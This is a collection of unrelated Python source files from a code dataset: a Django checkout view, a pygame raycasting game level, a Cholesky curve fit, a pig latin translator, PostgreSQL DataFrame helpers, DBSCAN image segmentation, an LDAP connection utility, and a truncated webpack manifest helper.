request.POST.get(\"zip_code\")\n phone_num = request.POST.get(\"phone_num\")\n\n new_billing_address = Address(\n user = request.user,\n first_name = first_name,\n last_name = last_name,\n country = billing_country,\n zip_code = zip_code,\n address = address,\n address_type = 'B',\n phone_num = phone_num,\n )\n new_billing_address.save()\n set_billing_default = request.POST.get(\"set_billing_address\")\n if set_billing_default:\n new_billing_address.default_address = True\n new_billing_address.save()\n order.billing_address = new_billing_address\n if not ship_diffrent_address:\n order.shipping_address = new_billing_address\n order.code = create_ref_code()\n order.ordered = True\n order.in_way = True\n order.save()\n\n # shipping address not billing address\n\n set_shipping_address = request.POST.get('set_shipping_address')\n default_shipping_address = request.POST.get('default_shipping_address')\n if ship_diffrent_address:\n first_name_s = request.POST.get(\"first_name_s\")\n last_name_s = request.POST.get(\"last_name_s\")\n #use default shipping address\n if default_shipping_address:\n shipping_address = Address.objects.filter(user=request.user,\n default_address=True,\n address_type='S').last()\n order.shipping_address = shipping_address\n order.code = create_ref_code()\n order.ordered = True\n order.in_way = True\n order.save()\n else:\n #new shipping address\n shipping_country = request.POST.get(\"shipping_country\")\n shipping_address = request.POST.get(\"shipping_address\")\n shipping_zip_code = request.POST.get(\"shipping_zip_code\")\n shipping_phone = request.POST.get(\"shipping_phone\")\n\n new_Shipping_address = Address(\n user = request.user,\n first_name = first_name_s,\n last_name = last_name_s,\n country = shipping_country,\n zip_code = shipping_zip_code,\n address = shipping_address,\n address_type = 'S',\n phone_num = shipping_phone,\n )\n new_Shipping_address.save()\n if set_shipping_address:\n new_shipping_address.default_address = True\n new_shipping_address.save()\n order.shipping_address = new_Shipping_address\n order.code = create_ref_code()\n order.ordered = True\n order.in_way = True\n order.save()\n\n messages.info(request, 'success')\n return redirect(\"/\")\n else:\n messages.info(request, 'sorry someyhing is wrong try again')\n return redirect(\"checkout:checkout\")\n\n\n#---# GET\n else:\n try:\n order = Order.objects.get(user= request.user, ordered=False)\n form = CheckoutForm()\n context = {'form':form,\n 'order':order\n }\n except:\n messages.info(request, 'sorry you dont have any active order')\n return redirect(\"products:list\")\n\n #get default billing\n last_default_billing_address = Address.objects.filter(user= request.user,\n address_type='B',\n default_address=True)\n if last_default_billing_address.exists():\n context.update({'default_billing_address':last_default_billing_address.last()})\n\n #get default shipping\n last_default_shipping_address = Address.objects.filter(user= request.user,\n address_type='S',\n default_address=True)\n if last_default_shipping_address.exists():\n context.update({'default_shipping_address':last_default_shipping_address.last()})\n\n\n template_name = 'checkout/checkout.html'\n\n return render(request, template_name, context)\n","sub_path":"src/checkout/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6790,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"495804567","text":"from ray_cast import *\r\nfrom enviroment_level_engine import *\r\nfrom sounds import *\r\n\r\nimport pygame\r\nfrom pygame.locals import *\r\n\r\nimport random\r\nimport sys\r\nimport math\r\nfrom pathlib import Path\r\n\r\n\r\ndef enviroment_level(screenX, display, Window_size, fs=False):\r\n pygame.mixer.pre_init(48000, -16, 2, 512)\r\n pygame.init()\r\n pygame.mixer.set_num_channels(16)\r\n\r\n clock = pygame.time.Clock()\r\n\r\n ss = Sounds()\r\n\r\n back_to_menu = False\r\n\r\n # !!!!!creating objects to control game\r\n loading = pygame.image.load(\"assets/textures/intro/loading.png\").convert()\r\n\r\n game = Game()\r\n game.fs = fs\r\n\r\n objects = Objects()\r\n\r\n objects.values[\"water\"] = 0\r\n objects.values[\"add_water\"] = False\r\n objects.values[\"dead\"] = False\r\n objects.values[\"tutorial_timer\"] = 0\r\n objects.values[\"won\"] = False\r\n\r\n ids = Id()\r\n\r\n # !!!!!creating player\r\n\r\n # never set direction to 0\r\n Player = Object(\"player\", game.custom_id_giver, [200, 200], [0, 0], 0.01, True, [8, 8])\r\n Player.move.collisions = True # enables collisions for player\r\n Player.move.speed = 8 # increasing speed so ur not super slow\r\n Player.move.angle_speed = Player.move.speed/160\r\n Player.move.offset = 30 # were creating 120 rays with 0.5 angle difference and we need player offset 30 angles\r\n # don't try to understand the comment above its just 30 it just is\r\n\r\n # simulating movement so u dont start at speed 0\r\n Player.dir_movement = Player.move.set_start_dir_movement(Player.direction, Player.dir_movement)\r\n\r\n # sorts player\r\n sort(Player, objects)\r\n # moves to next id\r\n game.custom_id_giver += 1\r\n\r\n # !!!!!creating rays\r\n\r\n rays = Rays(Player.direction, 200, display)\r\n\r\n # !!!!!creating map\r\n\r\n game_map = load_map(\"assets/maps/enviroment\")\r\n\r\n # !!!!! loading objects\r\n\r\n load_objects(game_map, 32, 32, objects, game)\r\n\r\n # !!!!! getting the dictionary for ray_casting\r\n # it contains textures for different blocks, numbers in map\r\n\r\n ray_dictionary = get_ray_dictionary()\r\n\r\n # timers for animations\r\n\r\n timer = Timers()\r\n timer.add_timer(40, True, \"ray_lava_animation\")\r\n\r\n # !!!!!game loop\r\n\r\n ss.sounds[\"Opener\"].play()\r\n while game.alive:\r\n # deleting objects\r\n\r\n game_map = objects.del_pos_in_map(game_map)\r\n objects.take_out_trash(ids)\r\n ids.remove_by_id(objects)\r\n\r\n # bg\r\n\r\n display.fill((0, 0, 0))\r\n\r\n # floor\r\n\r\n pygame.draw.rect(display, (186, 154, 88), (0, 330, 600, 120))\r\n pygame.draw.rect(display, (168, 136, 70), (0, 275, 600, 80))\r\n pygame.draw.rect(display, (145, 117, 60), (0, 245, 600, 30))\r\n pygame.draw.rect(display, (131, 106, 54), (0, 225, 600, 20))\r\n\r\n # celling\r\n\r\n pygame.draw.rect(display, (80, 80, 80), (0, -25, 600, 120))\r\n pygame.draw.rect(display, (60, 60, 60), (0, 95, 600, 80))\r\n pygame.draw.rect(display, (40, 40, 40), (0, 175, 600, 30))\r\n pygame.draw.rect(display, (20, 20, 20), (0, 205, 600, 20))\r\n\r\n # doing player movement\r\n\r\n Player.movement = Player.move.move(Player.dir_movement)\r\n Player.direction, Player.dir_movement = Player.move.change_dir(Player.direction, Player.dir_movement,\r\n Player.move.angle_speed)\r\n # second parameter is speed of rotation\r\n\r\n # adding additional conditions\r\n\r\n if objects.values[\"add_water\"]:\r\n objects.values[\"water\"] += 1\r\n ss.sounds[\"Item-pickup\"].play()\r\n objects.values[\"add_water\"] = False\r\n\r\n if objects.values[\"water\"] >= 20:\r\n for obj in objects.game_objects:\r\n if len(obj.memory) > 0:\r\n if obj.memory[0] == \"door\":\r\n hit_pos = [int(obj.object_pos[1] // 32), int(obj.object_pos[0] // 32)]\r\n objects.values[\"pos_to_del\"].append(hit_pos)\r\n objects.objects_to_delete.append(obj.object_id)\r\n ss.sounds[\"Door\"].play()\r\n\r\n # collisions\r\n\r\n objects.do_collisions(objects)\r\n\r\n # casting rays\r\n\r\n player_mid = [Player.object_pos[0] + (Player.size[0] / 2), Player.object_pos[1] + (Player.size[0] / 2)]\r\n rays.cast_rays(200, Player.direction, player_mid,\r\n game_map, Player.direction + (Player.move.offset * Player.move.degree), ray_dictionary)\r\n # for Player_mid argument we must give middle of player\r\n\r\n # running animations\r\n\r\n timer.add_time(ray_dictionary, objects)\r\n\r\n # event loop\r\n\r\n for event in pygame.event.get():\r\n if event.type == QUIT:\r\n pygame.quit()\r\n sys.exit()\r\n\r\n # key_down\r\n\r\n if event.type == KEYDOWN:\r\n if event.key == K_ESCAPE:\r\n objects.values[\"dead\"] = True\r\n game.alive = False\r\n back_to_menu = True\r\n\r\n elif event.key == K_f:\r\n # remember fs = fullscreen\r\n game.fs = not game.fs\r\n if game.fs is False:\r\n screenX = pygame.display.set_mode(Window_size)\r\n else:\r\n screenX = pygame.display.set_mode(Window_size, pygame.FULLSCREEN)\r\n\r\n elif event.key == K_d:\r\n Player.move.right = True\r\n elif event.key == K_a:\r\n Player.move.left = True\r\n elif event.key == K_w:\r\n Player.move.forward = True\r\n elif event.key == K_s:\r\n Player.move.backwards = True\r\n\r\n # key_up\r\n\r\n elif event.type == KEYUP:\r\n if event.key == K_d:\r\n Player.move.right = False\r\n elif event.key == K_a:\r\n Player.move.left = False\r\n elif event.key == K_w:\r\n Player.move.forward = False\r\n elif event.key == K_s:\r\n Player.move.backwards = False\r\n\r\n # tutorial\r\n\r\n if objects.values[\"tutorial_timer\"] < 120:\r\n display.blit(pygame.image.load(\"assets/textures/intro/env0.png\"), [0, 0])\r\n elif objects.values[\"tutorial_timer\"] < 240:\r\n display.blit(pygame.image.load(\"assets/textures/intro/env1.png\"), [0, 0])\r\n elif objects.values[\"tutorial_timer\"] < 280:\r\n display.blit(pygame.image.load(\"assets/textures/intro/fullscreen_tutorial.png\"), [0, 0])\r\n\r\n objects.values[\"tutorial_timer\"] += 1\r\n\r\n # checking if dead or won\r\n\r\n if objects.values[\"dead\"]:\r\n display.blit(loading, [0, 0])\r\n screenX.blit(pygame.transform.scale(display, Window_size), (0, 0))\r\n pygame.display.update()\r\n game.alive = False\r\n\r\n if objects.values[\"won\"]:\r\n display.blit(loading, [0, 0])\r\n screenX.blit(pygame.transform.scale(display, Window_size), (0, 0))\r\n pygame.display.update()\r\n game.alive = False\r\n file = open(\"assets/save.txt\", \"w\")\r\n file.write(\"space_station\")\r\n file.close()\r\n\r\n # basic loop config\r\n\r\n screenX.blit(pygame.transform.scale(display, Window_size), (0, 0))\r\n pygame.display.update()\r\n clock.tick(40)\r\n\r\n if back_to_menu:\r\n return False, fs\r\n return True, fs\r\n","sub_path":"enviroment_level.py","file_name":"enviroment_level.py","file_ext":"py","file_size_in_byte":7522,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"15527657","text":"# -*- coding: utf-8 -*-\nimport numpy as np\nimport matplotlib\nmatplotlib.use('pdf')\nimport matplotlib.pyplot as plt\nimport os\nnom_pdf = os.path.basename(__file__).replace('.py','.pdf')\n\ndef resul_sup(S,Y):\n n = len(S)\n X = [ 0 for i in range(n)]\n i = n-1\n while i >= 0:\n X[i] = Y[i][0]\n j = n-1\n while j > i:\n X[i] -= S[i][j]*X[j]\n j -= 1\n X[i] = X[i]/S[i][i]\n i -= 1\n return [ [v] for v in X]\n\ndef resul_inf(S,Y):\n n = len(S)\n X = [ 0 for i in range(n)]\n i = 0\n while i < n:\n X[i] = Y[i][0]\n j = 0\n while j < i:\n X[i] -= S[i][j]*X[j]\n j += 1\n X[i] = X[i]/S[i][i]\n i += 1\n return [ [v] for v in X]\n \ndef transpose(M):\n n = len(M)\n T = [[0 for i in range(n)] for j in range(n)]\n for i in range(n):\n for j in range(n):\n T[i][j] = M[j][i]\n return T\n \nS = [[2,2,3,4], [0,1,2,3],[0,0,1,2],[0,0,0,1]]\n#print(S, transpose(S))\n\nI = [[2,0,0,0], [2,1,0,0],[1,2,3,0],[0,0,0,2]]\nY = [[1],[2],[3],[4]]\n#X = resul_sup(S,Y)\nX = resul_inf(I,Y)\nX = np.array(X)\nS = np.array(S)\nI = np.array(I)\n#print(np.dot(I,X))\n\nZ = [0, 3, 7, 13, 21, 30, 40, 53, 66, 82, 99, 117, 138, 159]\nt = [ [1, 4*i , (4*i)**2] for i in range(14)]\nV = np.array(t)\ntV = np.transpose(V)\nY = np.dot(tV,Z)\nA = np.dot(tV,V)\nL = np.linalg.cholesky(A) #renvoie l\ntL = np.transpose(L)\nX1 = np.linalg.solve(L,Y)\nX = np.linalg.solve(tL,X1)\n\ndef f(t):\n return X[0] + X[1]*t + X[2]*t**2\n\nt = [4*i for i in range(14)]\nplt.plot(t, Z, 'bo')\nplt.plot(t, [f(4*i) for i in range(14)], 'r')\n\nplt.savefig(nom_pdf)\nplt.close()\n","sub_path":"Echolesky_1_fig.py","file_name":"Echolesky_1_fig.py","file_ext":"py","file_size_in_byte":1644,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"468589466","text":"# The pig latin translator\n\npig = \"ay\"\n\nword1 = input(\"Please enter your desired word:\")\n\nif len(word1) > 0 and word1.isalpha():\n word2 = word1[1]\n word3 = word1 + word2 + pig\n word3 = word3[1:len(word3)]\n print(word3)\n \nelse:\n print(\"The word you've entered is not valid. Please choose another one.\")\n \n \n","sub_path":"Single word pig latin translator/Single word pig latin translator.py","file_name":"Single word pig latin translator.py","file_ext":"py","file_size_in_byte":330,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"633976343","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Sep 25 16:34:24 2014\n\n@author: rob\n\"\"\"\nimport numpy as np\nimport pandas as pd\nimport psycopg2 as pg\nfrom os.path import abspath\n\ndef get_connection(user='enfoldreader', password='enfoldreader'):\n return pg.connect(host='128.40.150.11',\n database='enfolding',\n user=user,\n password=password)\n\ndef get_user_connection(user='enfolding'):\n pwd = raw_input('Password for user %s:' % user)\n return get_connection(user=user, password=pwd)\n\ndef df_from_sql(sql):\n \"\"\"\n Create a dataframe from the given SQL statement.\n \n The connection used is whatever is returned from\n `get_connection`\n \"\"\"\n conn = get_connection()\n df = pd.read_sql_query(sql, conn)\n conn.close()\n return df\n\ndef insert_df_to_database(df, tablename, dbcols=None):\n \"\"\"\n Write the DataFrame `df` to the Enfolding database.\n \n Parameters\n ----------\n df: pandas.core.frame.DataFrame\n The dataframe to write\n tablename: str\n The name (with schema prepended if necessary) of the table to write to\n dbcols: dict\n A dictionary whose keys are columns of the DataFrame `db` to write, and \n whose values are the names of the columns in the database to write\n each DataFrame column to.\n \"\"\"\n if dbcols is None:\n dbcols = {k:k for k in df} # iterate column names\n sql = \"INSERT INTO %s(%s) VALUES\\n\" % (tablename, ','.join(dbcols.keys()))\n sql += _build_values(df, dbcols)\n with get_user_connection('enfolding') as con:\n with con.cursor() as cur:\n cur.execute(sql)\n con.commit()\n\ndef update_df_to_database(df, tablename, \n indexcols, dbcols):\n \"\"\"\n Update `tablename` in the Enfolding database with the DataFrame `df`.\n \n Parameters\n ----------\n df: pandas.core.frame.DataFrame\n The dataframe to write\n tablename: str\n The name (with schema prepended if necessary) of the table to write to\n indexcols: dict\n A dictionary whose keys are the name(s) of the (Multi)Index levels\n and whose values are the equivalent columns in the database\n dbcols: dict\n A dictionary whose keys are columns of the DataFrame `db` to write, and \n whose values are the names of the columns in the database to write\n each DataFrame column to.\n \"\"\"\n sql = build_update(df=df, tablename=tablename,\n indexcols=indexcols, dbcols=dbcols)\n with get_user_connection('enfolding') as con:\n with con.cursor() as cur:\n cur.execute(sql)\n con.commit()\n \ndef build_update(df, tablename, indexcols, dbcols):\n all_cols = indexcols.copy()\n all_cols.update(dbcols)\n df = pd.DataFrame(df).reset_index()\n sql = 'update %s as to_update' % tablename\n set_sql = 'set %s' % ', '.join(['\"%s\" = other.\"%s\"' % (v, k) for k, v in dbcols.iteritems()])\n values_sql = _build_values(df, all_cols)\n as_sql = _build_as('other', all_cols)\n from_sql = \"from (values %s) %s\" % (values_sql, as_sql)\n where_sql = _build_update_where('to_update', 'other', indexcols)\n return '\\n'.join([sql, set_sql, from_sql, where_sql])\n\ndef _value_row(row, columns):\n \"\"\"\n Turn a DataFrame row into a string of the form (col1, col2...)\n with the values appropriately quoted\n \"\"\"\n return '(%s)' % ', '.join([type_sensitive_quoting(row[k]) % row[k] for k in columns])\n\ndef _build_values(df, columns):\n \"\"\"\n A comma separated list of `_value_row`s, one for each row of\n `df`\n \"\"\"\n return ',\\n'.join(df.apply(_value_row, columns=columns, axis=1))\n\ndef _build_as(tbl_name, columns):\n as_string = \",\".join('\"%s\"' % k for k in columns)\n return \"AS %s(%s)\" % (tbl_name, as_string)\n\ndef _build_update_where(update_tbl, values_tbl, columns):\n \"\"\"\n return a where statement for each entry in columns\n \"\"\"\n clauses = ['%s.\"%s\" = %s.\"%s\"' % (values_tbl, k, update_tbl, v) for k, v in columns.iteritems()]\n where = ' AND '.join(clauses)\n return \"WHERE %s;\" % where\n\ndef build_set(row, dbcols):\n set_ = \" SET \"\n for dbcol in dbcols:\n value = row[dbcol]\n append = type_sensitive_equals(value)\n set_ += append % (dbcols[dbcol], value) + \", \"\n return set_[:-2] # Remove the last comma\n \ndef build_where(row, indexcols):\n \"\"\"\n Make a SQL WHERE statement from the DataFrame row `row`.\n \"\"\"\n where = \" WHERE \"\n for indexcol in indexcols:\n v = row[indexcol]\n if pd.isnull(v):\n where += \"1 = 2 AND \" # One of the keys is null!\n else:\n append = type_sensitive_equals(v)\n where += append % (indexcols[indexcol], row[indexcol]) + \" AND \"\n return where[:-5] # Remove the last \" AND \"\n \ndef type_sensitive_equals(v):\n return '\"%s\" = ' + type_sensitive_quoting(v)\n\ndef type_sensitive_quoting(v):\n try:\n int_v = int(v)\n # v is coercible as a number\n if int(v) == float(v):\n return '%i'\n else:\n return '%f'\n except ValueError:\n try:\n if np.isnan(v):\n # v is null\n return 'NULL /*%s*/'\n except TypeError:\n # v is not a number and is not null:\n # $$ is an escape-hell free way to write strings\n # in Postgres\n return \"$string$%s$string$\"\n","sub_path":"database/sql.py","file_name":"sql.py","file_ext":"py","file_size_in_byte":5409,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"391609183","text":"# -*- coding: utf-8 -*-\n\n#\n# Copyright (c) 2016-2021 Virtual Cable S.L.U.\n# All rights reserved.\n#\n# Redistribution and use in source and binary forms, with or without modification,\n# are permitted provided that the following conditions are met:\n#\n# * Redistributions of source code must retain the above copyright notice,\n# this list of conditions and the following disclaimer.\n# * Redistributions in binary form must reproduce the above copyright notice,\n# this list of conditions and the following disclaimer in the documentation\n# and/or other materials provided with the distribution.\n# * Neither the name of Virtual Cable S.L.U. nor the names of its contributors\n# may be used to endorse or promote products derived from this software\n# without specific prior written permission.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\n# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE\n# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE\n# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL\n# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR\n# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER\n# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,\n# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE\n# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\n\"\"\"\n@author: Adolfo Gómez, dkmaster at dkmon dot com\n\"\"\"\nimport logging\nimport typing\nimport tempfile\nimport os.path\n\nimport ldap.filter\n\nfrom django.utils.translation import gettext as _\nfrom uds.core.util import tools\n\nlogger = logging.getLogger(__name__)\n\nLDAPResultType = typing.MutableMapping[str, typing.Any]\n\nfrom ldap import (\n SCOPE_BASE, # type: ignore\n SCOPE_SUBTREE, # type: ignore\n SCOPE_ONELEVEL, # type: ignore\n SCOPE_SUBORDINATE, # type: ignore\n)\n\n\nclass LDAPError(Exception):\n @staticmethod\n def reraise(e: typing.Any):\n _str = _('Connection error: ')\n if hasattr(e, 'message') and isinstance(e.message, dict):\n _str += '{}, {}'.format(e.message.get('info', ''), e.message.get('desc'))\n else:\n _str += '{}'.format(e)\n raise LDAPError(_str)\n\n\ndef escape(value: str):\n \"\"\"\n Escape filter chars for ldap search filter\n \"\"\"\n return ldap.filter.escape_filter_chars(value)\n\n\ndef connection(\n username: str,\n passwd: typing.Union[str, bytes],\n host: str,\n *,\n port: int = -1,\n ssl: bool = False,\n timeout: int = 3,\n debug: bool = False,\n verify_ssl: bool = False,\n certificate: typing.Optional[str] = None, # Content of the certificate, not the file itself\n) -> typing.Any:\n \"\"\"\n Tries to connect to ldap. If username is None, it tries to connect using user provided credentials.\n @param username: Username for connection validation\n @param password: Password for connection validation\n @return: Connection established\n @raise exception: If connection could not be established\n \"\"\"\n logger.debug('Login in to %s as user %s', host, username)\n l = None\n password = passwd.encode('utf-8') if isinstance(passwd, str) else passwd\n\n try:\n if debug:\n ldap.set_option(ldap.OPT_DEBUG_LEVEL, 8191) # type: ignore\n\n schema = 'ldaps' if ssl else 'ldap'\n if port == -1:\n port = 636 if ssl else 389\n uri = \"{}://{}:{}\".format(schema, host, port)\n logger.debug('Ldap uri: %s', uri)\n\n l = ldap.initialize(uri=uri) # type: ignore\n l.set_option(ldap.OPT_REFERRALS, 0) # type: ignore\n l.set_option(ldap.OPT_TIMEOUT, int(timeout)) # type: ignore\n l.network_timeout = int(timeout)\n l.protocol_version = ldap.VERSION3 # type: ignore\n\n certificate = (certificate or '').strip()\n\n if ssl:\n if certificate and verify_ssl: # If not verify_ssl, we don't need the certificate\n # Create a semi-temporary ca file, with the content of the certificate\n # The name is from the host, so we can ovwerwrite it if needed\n cert_filename = os.path.join(tempfile.gettempdir(), f'ldap-cert-{host}.pem')\n with open(cert_filename, 'w') as f:\n f.write(certificate)\n l.set_option(ldap.OPT_X_TLS_CACERTFILE, cert_filename) # type: ignore\n\n if not verify_ssl:\n l.set_option(ldap.OPT_X_TLS_REQUIRE_CERT, ldap.OPT_X_TLS_NEVER) # type: ignore\n # Disable TLS1 and TLS1.1\n # 0x304 = TLS1.3, 0x303 = TLS1.2, 0x302 = TLS1.1, 0x301 = TLS1.0, but use ldap module constants\n l.set_option(ldap.OPT_X_TLS_PROTOCOL_MIN, ldap.OPT_X_TLS_PROTOCOL_TLS1_2) # type: ignore\n\n l.set_option(ldap.OPT_X_TLS_NEWCTX, 0) # type: ignore\n \n l.simple_bind_s(who=username, cred=password)\n except ldap.SERVER_DOWN as e: # type: ignore\n raise LDAPError(_('Can\\'t contact LDAP server') + ': {}'.format(e))\n except ldap.LDAPError as e: # type: ignore\n LDAPError.reraise(e)\n except Exception as e:\n logger.exception('Exception connection:')\n raise LDAPError('{}'.format(e))\n\n logger.debug('Connection was successful')\n return l\n\n\ndef getAsDict(\n con: typing.Any,\n base: str,\n ldapFilter: str,\n attrList: typing.Optional[typing.Iterable[str]]=None,\n sizeLimit: int=100,\n scope=SCOPE_SUBTREE,\n) -> typing.Generator[LDAPResultType, None, None]:\n \"\"\"\n Makes a search on LDAP, adjusting string to required type (ascii on python2, str on python3).\n returns an generator with the results, where each result is a dictionary where it values are always a list of strings\n \"\"\"\n logger.debug('Filter: %s, attr list: %s', ldapFilter, attrList)\n\n if attrList:\n attrList = [i for i in attrList] # Ensures iterable is a list\n\n res = None\n try:\n # On python2, attrs and search string is str (not unicode), in 3, str (not bytes)\n res = con.search_ext_s(\n base,\n scope=scope,\n filterstr=ldapFilter,\n attrlist=attrList,\n sizelimit=sizeLimit,\n )\n except ldap.LDAPError as e: # type: ignore\n LDAPError.reraise(e)\n except Exception as e:\n logger.exception('Exception connection:')\n raise LDAPError('{}'.format(e))\n\n logger.debug('Result of search %s on %s: %s', ldapFilter, base, res)\n\n if res is not None:\n for r in res:\n if r[0] is None:\n continue # Skip None entities\n\n # Convert back attritutes to test_type ONLY on python2\n dct = (\n tools.CaseInsensitiveDict((k, ['']) for k in attrList)\n if attrList is not None\n else tools.CaseInsensitiveDict()\n )\n\n # Convert back result fields to str\n for k, v in r[1].items():\n dct[k] = list(i.decode('utf8', errors='replace') for i in v)\n\n dct.update({'dn': r[0]})\n\n yield dct\n\n\ndef getFirst(\n con: typing.Any,\n base: str,\n objectClass: str,\n field: str,\n value: str,\n attributes: typing.Optional[typing.Iterable[str]] = None,\n sizeLimit: int = 50,\n) -> typing.Optional[LDAPResultType]:\n \"\"\"\n Searchs for the username and returns its LDAP entry\n @param username: username to search, using user provided parameters at configuration to map search entries.\n @param objectClass: Objectclass of the user mane username to search.\n @return: None if username is not found, an dictionary of LDAP entry attributes if found (all in unicode on py2, str on py3).\n \"\"\"\n value = ldap.filter.escape_filter_chars(value)\n\n attrList = [field] + [i for i in attributes] if attributes else []\n\n ldapFilter = '(&(objectClass={})({}={}))'.format(objectClass, field, value)\n\n try:\n obj = next(getAsDict(con, base, ldapFilter, attrList, sizeLimit))\n except StopIteration:\n return None # None found\n\n obj['_id'] = value\n\n return obj\n\n\n# Recursive delete\ndef recursive_delete(con: typing.Any, base_dn: str) -> None:\n search = con.search_s(base_dn, SCOPE_ONELEVEL) # type: ignore\n\n for dn, _ in search:\n # recursive_delete(conn, dn)\n # RIGHT NOW IS NOT RECURSIVE, JUST 1 LEVEL BELOW!!!\n con.delete_s(dn)\n\n con.delete_s(base_dn)\n\n\ndef getRootDSE(con: typing.Any) -> typing.Optional[LDAPResultType]:\n \"\"\"\n Gets the root DSE of the LDAP server\n @param cont: Connection to LDAP server\n @return: None if root DSE is not found, an dictionary of LDAP entry attributes if found (all in unicode on py2, str on py3).\n \"\"\"\n return next(getAsDict(\n con=con,\n base='',\n ldapFilter='(objectClass=*)',\n scope=SCOPE_BASE,\n ))\n","sub_path":"server/src/uds/core/util/ldaputil.py","file_name":"ldaputil.py","file_ext":"py","file_size_in_byte":9019,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"320657144","text":"import cv2\nimport numpy as np\nfrom sklearn.cluster import DBSCAN\n\nfrom recognition.main import predict\nfrom recognition.preprocess import thresh, apply_mask, prop_resize_cv\n\n\ndef segmentation(img):\n # TODO: Рассчёт значений EPS и MIN SAMPLES для каждого изображения\n # TODO: Деформация изображения для повторной кластеризации?\n mask = thresh(img)\n masked = apply_mask(img, mask)\n\n # Кластеризация\n X = []\n h, w = mask.shape\n for i in range(h):\n for j in range(w):\n if mask[i, j] == 0:\n X.append([i, j, masked[i, j, 0], masked[i, j, 1], masked[i, j, 2]])\n X = np.array(X)\n\n labels = DBSCAN(eps=17, min_samples=13).fit_predict(X)\n\n # Убрать шум\n Y = []\n new_labels = []\n for k, x in enumerate(X):\n if labels[k] >= 0:\n new_labels.append(labels[k])\n Y.append(x)\n\n new_labels = np.array(new_labels)\n Y = np.array(Y)\n\n # Выделение сегментов\n segments_d = {}\n for k, l in enumerate(new_labels):\n if l not in segments_d:\n segments_d[l] = []\n segments_d[l].append([Y[k, 0], Y[k, 1]])\n\n # Рассчёт центров\n centroids = []\n for k in segments_d:\n centroids.append(np.sum(segments_d[k], axis=0) // len(segments_d[k]))\n centroids = np.array(centroids)\n\n # Повторная кластеризация\n labels = DBSCAN(eps=35, min_samples=1).fit_predict(np.array([[x[0] * 3, x[1] / 2] for x in centroids]))\n\n # Убрать шум\n Y = []\n new_labels = []\n for k, x in enumerate(centroids):\n if labels[k] >= 0:\n new_labels.append(labels[k])\n Y.append(x)\n\n Y = np.array(Y)\n\n # Сегментация\n new_segments_d = {}\n for k, x in enumerate(segments_d):\n if labels[k] not in new_segments_d:\n new_segments_d[labels[k]] = segments_d[x]\n else:\n new_segments_d[labels[k]] = np.append(new_segments_d[labels[k]], segments_d[x], axis=0)\n\n segments = []\n for k in new_segments_d:\n x = np.array(new_segments_d[k])\n off_y, off_x = (min(x[:, 0]), min(x[:, 1]))\n h, w = (max(x[:, 0]) - off_y + 1, max(x[:, 1]) - off_x + 1)\n seg = np.empty((h, w), dtype='uint8')\n seg.fill(255)\n for el in x:\n seg[el[0] - off_y, el[1] - off_x] = 0\n segments.append((seg, ((off_x, off_y), (w + off_x, h + off_y)), (w, h)))\n\n print('Segments: {}'.format(len(segments)))\n\n return np.array(segments)\n\n\nif __name__ == '__main__':\n img = cv2.imread('../data/boards/cut/IMG_20190218_170650.jpg')\n img = prop_resize_cv(img, (1280, 720))\n\n cv2.imshow('img', thresh(img))\n cv2.waitKey()\n cv2.destroyAllWindows()\n\n segments = segmentation(img)\n new = img.copy()\n for s in segments:\n c = [int(np.random.random() * 255) for k in range(3)]\n col = np.full((s[2][1], s[2][0], 3), c)\n col = cv2.bitwise_and(col, col, mask=(255 - s[0]))\n new[s[1][0][1]:s[1][1][1], s[1][0][0]:s[1][1][0]] = col\n\n cv2.imshow('img', new)\n cv2.waitKey()\n cv2.destroyAllWindows()","sub_path":"recognition/segmentation.py","file_name":"segmentation.py","file_ext":"py","file_size_in_byte":3225,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"652486507","text":"# -*- coding: utf-8 -*-\n\nimport json\nimport logging\n\nfrom django.conf import settings\n\n_logger = logging.getLogger()\n\n\ndef get_manifest_data(filename):\n try:\n with open(filename) as f:\n return json.load(f)\n except AttributeError:\n _logger.error('Please add the path to manifest.json file.')\n except IOError:\n _logger.error('Please provide proper manifest filename ({})'\n .format(filename))\n\n\ndef get_manifest():\n reload_manifest = getattr(settings, 'RELOAD_MANIFEST', False)\n if not hasattr(settings, 'STATIC_MANIFEST') or reload_manifest:\n manifest = get_manifest_data(settings.MANIFEST_FILENAME)\n setattr(settings, 'STATIC_MANIFEST', manifest)\n return settings.STATIC_MANIFEST\n\n\ndef _get_chunk_with_suffix(chunkname, suffix):\n manifest = get_manifest()\n assets = manifest['assetsByChunkName'][chunkname]\n if isinstance(assets, basestring):\n assets = [assets]\n for a in filter(lambda s: s.endswith(suffix), assets):\n yield a\n\n\ndef get_js_from_chunk(chunkname):\n return \" \".join([''.format(s)\n for s in _get_chunk_with_suffix(chunkname, '.js')])\n\n\ndef get_css_from_chunk(chunkname):\n return \" \".join([''.format(c)\n for c in _get_chunk_with_suffix(chunkname, 